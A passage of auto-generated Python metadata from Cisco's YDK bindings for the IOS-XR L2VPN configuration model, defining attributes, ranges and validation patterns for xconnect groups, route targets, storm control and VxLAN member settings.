_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
False,
[
_MetaInfoClassMember('addr-index', ATTRIBUTE, 'int' , None, None,
[('0', '65535')], [],
''' Addr index
''',
'addr_index',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' IPV4 address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ipv4-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
False,
[
_MetaInfoClassMember('format', REFERENCE_ENUM_CLASS, 'BgpRouteTargetFormatEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetFormatEnum',
[], [],
''' Format of the route target
''',
'format',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('role', REFERENCE_ENUM_CLASS, 'BgpRouteTargetRoleEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'BgpRouteTargetRoleEnum',
[], [],
''' Role of the router target type
''',
'role',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('ipv4-address', REFERENCE_LIST, 'Ipv4Address' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.Ipv4Address',
[], [],
''' ipv4 address
''',
'ipv4_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('two-byte-as-or-four-byte-as', REFERENCE_LIST, 'TwoByteAsOrFourByteAs' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget.TwoByteAsOrFourByteAs',
[], [],
''' two byte as or four byte as
''',
'two_byte_as_or_four_byte_as',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-target',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
False,
[
_MetaInfoClassMember('mp2mp-route-target', REFERENCE_LIST, 'Mp2MpRouteTarget' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets.Mp2MpRouteTarget',
[], [],
''' Name of the Route Target
''',
'mp2mp_route_target',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-route-targets',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
False,
[
_MetaInfoClassMember('flow-label', REFERENCE_ENUM_CLASS, 'FlowLabelLoadBalanceEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'FlowLabelLoadBalanceEnum',
[], [],
''' Flow Label load balance type
''',
'flow_label',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('static', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Static Flow Label
''',
'static',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'flow-label-load-balance',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3,4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3,4}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' The name of the Attachment Circuit
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Remote Customer Edge Identifier
''',
'remote_ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
False,
[
_MetaInfoClassMember('remote-ceid-attachment-circuit', REFERENCE_LIST, 'RemoteCeidAttachmentCircuit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits.RemoteCeidAttachmentCircuit',
[], [],
''' AC And Remote Customer Edge Identifier
''',
'remote_ceid_attachment_circuit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'remote-ceid-attachment-circuits',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
False,
[
_MetaInfoClassMember('ce-id', ATTRIBUTE, 'int' , None, None,
[('1', '16384')], [],
''' Local Customer Edge Identifier
''',
'ce_id',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('remote-ceid-attachment-circuits', REFERENCE_CLASS, 'RemoteCeidAttachmentCircuits' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid.RemoteCeidAttachmentCircuits',
[], [],
''' AC And Remote Customer Edge Identifier
Table
''',
'remote_ceid_attachment_circuits',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceid',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
False,
[
_MetaInfoClassMember('ceid', REFERENCE_LIST, 'Ceid' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids.Ceid',
[], [],
''' Local Customer Edge Identifier
''',
'ceid',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'ceids',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
False,
[
_MetaInfoClassMember('ce-range', ATTRIBUTE, 'int' , None, None,
[('11', '100')], [],
''' Local Customer Edge Identifier
''',
'ce_range',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ceids', REFERENCE_CLASS, 'Ceids' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.Ceids',
[], [],
''' Local Customer Edge Identifier Table
''',
'ceids',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable signaling protocol
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('flow-label-load-balance', REFERENCE_CLASS, 'FlowLabelLoadBalance' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol.FlowLabelLoadBalance',
[], [],
''' Enable Flow Label based load balancing
''',
'flow_label_load_balance',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-signaling-protocol',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable auto-discovery
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-policy', REFERENCE_CLASS, 'Mp2MpRoutePolicy' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRoutePolicy',
[], [],
''' Route policy
''',
'mp2mp_route_policy',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-route-targets', REFERENCE_CLASS, 'Mp2MpRouteTargets' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpRouteTargets',
[], [],
''' Route Target
''',
'mp2mp_route_targets',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-signaling-protocol', REFERENCE_CLASS, 'Mp2MpSignalingProtocol' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.Mp2MpSignalingProtocol',
[], [],
''' signaling protocol in this MP2MP
''',
'mp2mp_signaling_protocol',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('route-distinguisher', REFERENCE_CLASS, 'RouteDistinguisher' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery.RouteDistinguisher',
[], [],
''' Route Distinguisher
''',
'route_distinguisher',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-auto-discovery',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 26)], [],
''' Name of the multi point to multi point
xconnect
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-auto-discovery', REFERENCE_CLASS, 'Mp2MpAutoDiscovery' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect.Mp2MpAutoDiscovery',
[], [],
''' auto-discovery in this MP2MP
''',
'mp2mp_auto_discovery',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-control-word', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable control word
''',
'mp2mp_control_word',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-interworking', REFERENCE_ENUM_CLASS, 'InterworkingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterworkingEnum',
[], [],
''' Interworking
''',
'mp2mp_interworking',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mp-shutdown', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' shutdown this MP2MP VPWS instance
''',
'mp2mp_shutdown',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpl2-encapsulation', REFERENCE_ENUM_CLASS, 'L2EncapsulationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2EncapsulationEnum',
[], [],
''' Configure Layer 2 Encapsulation
''',
'mp2mpl2_encapsulation',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpmtu', ATTRIBUTE, 'int' , None, None,
[('64', '65535')], [],
''' Maximum transmission unit for this MP2MP
VPWS instance
''',
'mp2mpmtu',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('mp2mpvpn-id', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' VPN Identifier
''',
'mp2mpvpn_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnect',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
False,
[
_MetaInfoClassMember('mp2mp-xconnect', REFERENCE_LIST, 'Mp2MpXconnect' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects.Mp2MpXconnect',
[], [],
''' Multi point to multi point xconnect
''',
'mp2mp_xconnect',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'mp2mp-xconnects',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups.XconnectGroup' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups.XconnectGroup',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Name of the xconnect group
''',
'name',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('mp2mp-xconnects', REFERENCE_CLASS, 'Mp2MpXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.Mp2MpXconnects',
[], [],
''' List of multi point to multi point xconnects
''',
'mp2mp_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('p2p-xconnects', REFERENCE_CLASS, 'P2PXconnects' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup.P2PXconnects',
[], [],
''' List of point to point xconnects
''',
'p2p_xconnects',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-group',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.XconnectGroups' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.XconnectGroups',
False,
[
_MetaInfoClassMember('xconnect-group', REFERENCE_LIST, 'XconnectGroup' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.XconnectGroups.XconnectGroup',
[], [],
''' Xconnect group
''',
'xconnect_group',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'xconnect-groups',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-control',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls',
False,
[
_MetaInfoClassMember('bd-storm-control', REFERENCE_LIST, 'BdStormControl' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdStormControls.BdStormControl',
[], [],
''' Storm Control Type
''',
'bd_storm_control',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-storm-controls',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
False,
[
_MetaInfoClassMember('mac-address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'mac_address',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('next-hop-ip', ATTRIBUTE, 'str' , None, None,
[], ['(([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9][0-9]|2[0-4][0-9]|25[0-5])(%[\\p{N}\\p{L}]+)?'],
''' Enable Static Mac Address Configuration
''',
'next_hop_ip',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
False,
[
_MetaInfoClassMember('member-vni-static-mac-address', REFERENCE_LIST, 'MemberVniStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses.MemberVniStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'member_vni_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
False,
[
_MetaInfoClassMember('vni', ATTRIBUTE, 'int' , None, None,
[('1', '16777215')], [],
''' VxLAN Network Identifier number
''',
'vni',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('member-vni-static-mac-addresses', REFERENCE_CLASS, 'MemberVniStaticMacAddresses' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni.MemberVniStaticMacAddresses',
[], [],
''' Static Mac Address Table
''',
'member_vni_static_mac_addresses',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vni',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis',
False,
[
_MetaInfoClassMember('member-vni', REFERENCE_LIST, 'MemberVni' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.MemberVnis.MemberVni',
[], [],
''' Bridge Domain Member VxLAN Network
Identifier
''',
'member_vni',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'member-vnis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainMac.BdMacLimit',
False,
[
_MetaInfoClassMember('bd-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'bd_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('bd-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'bd_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
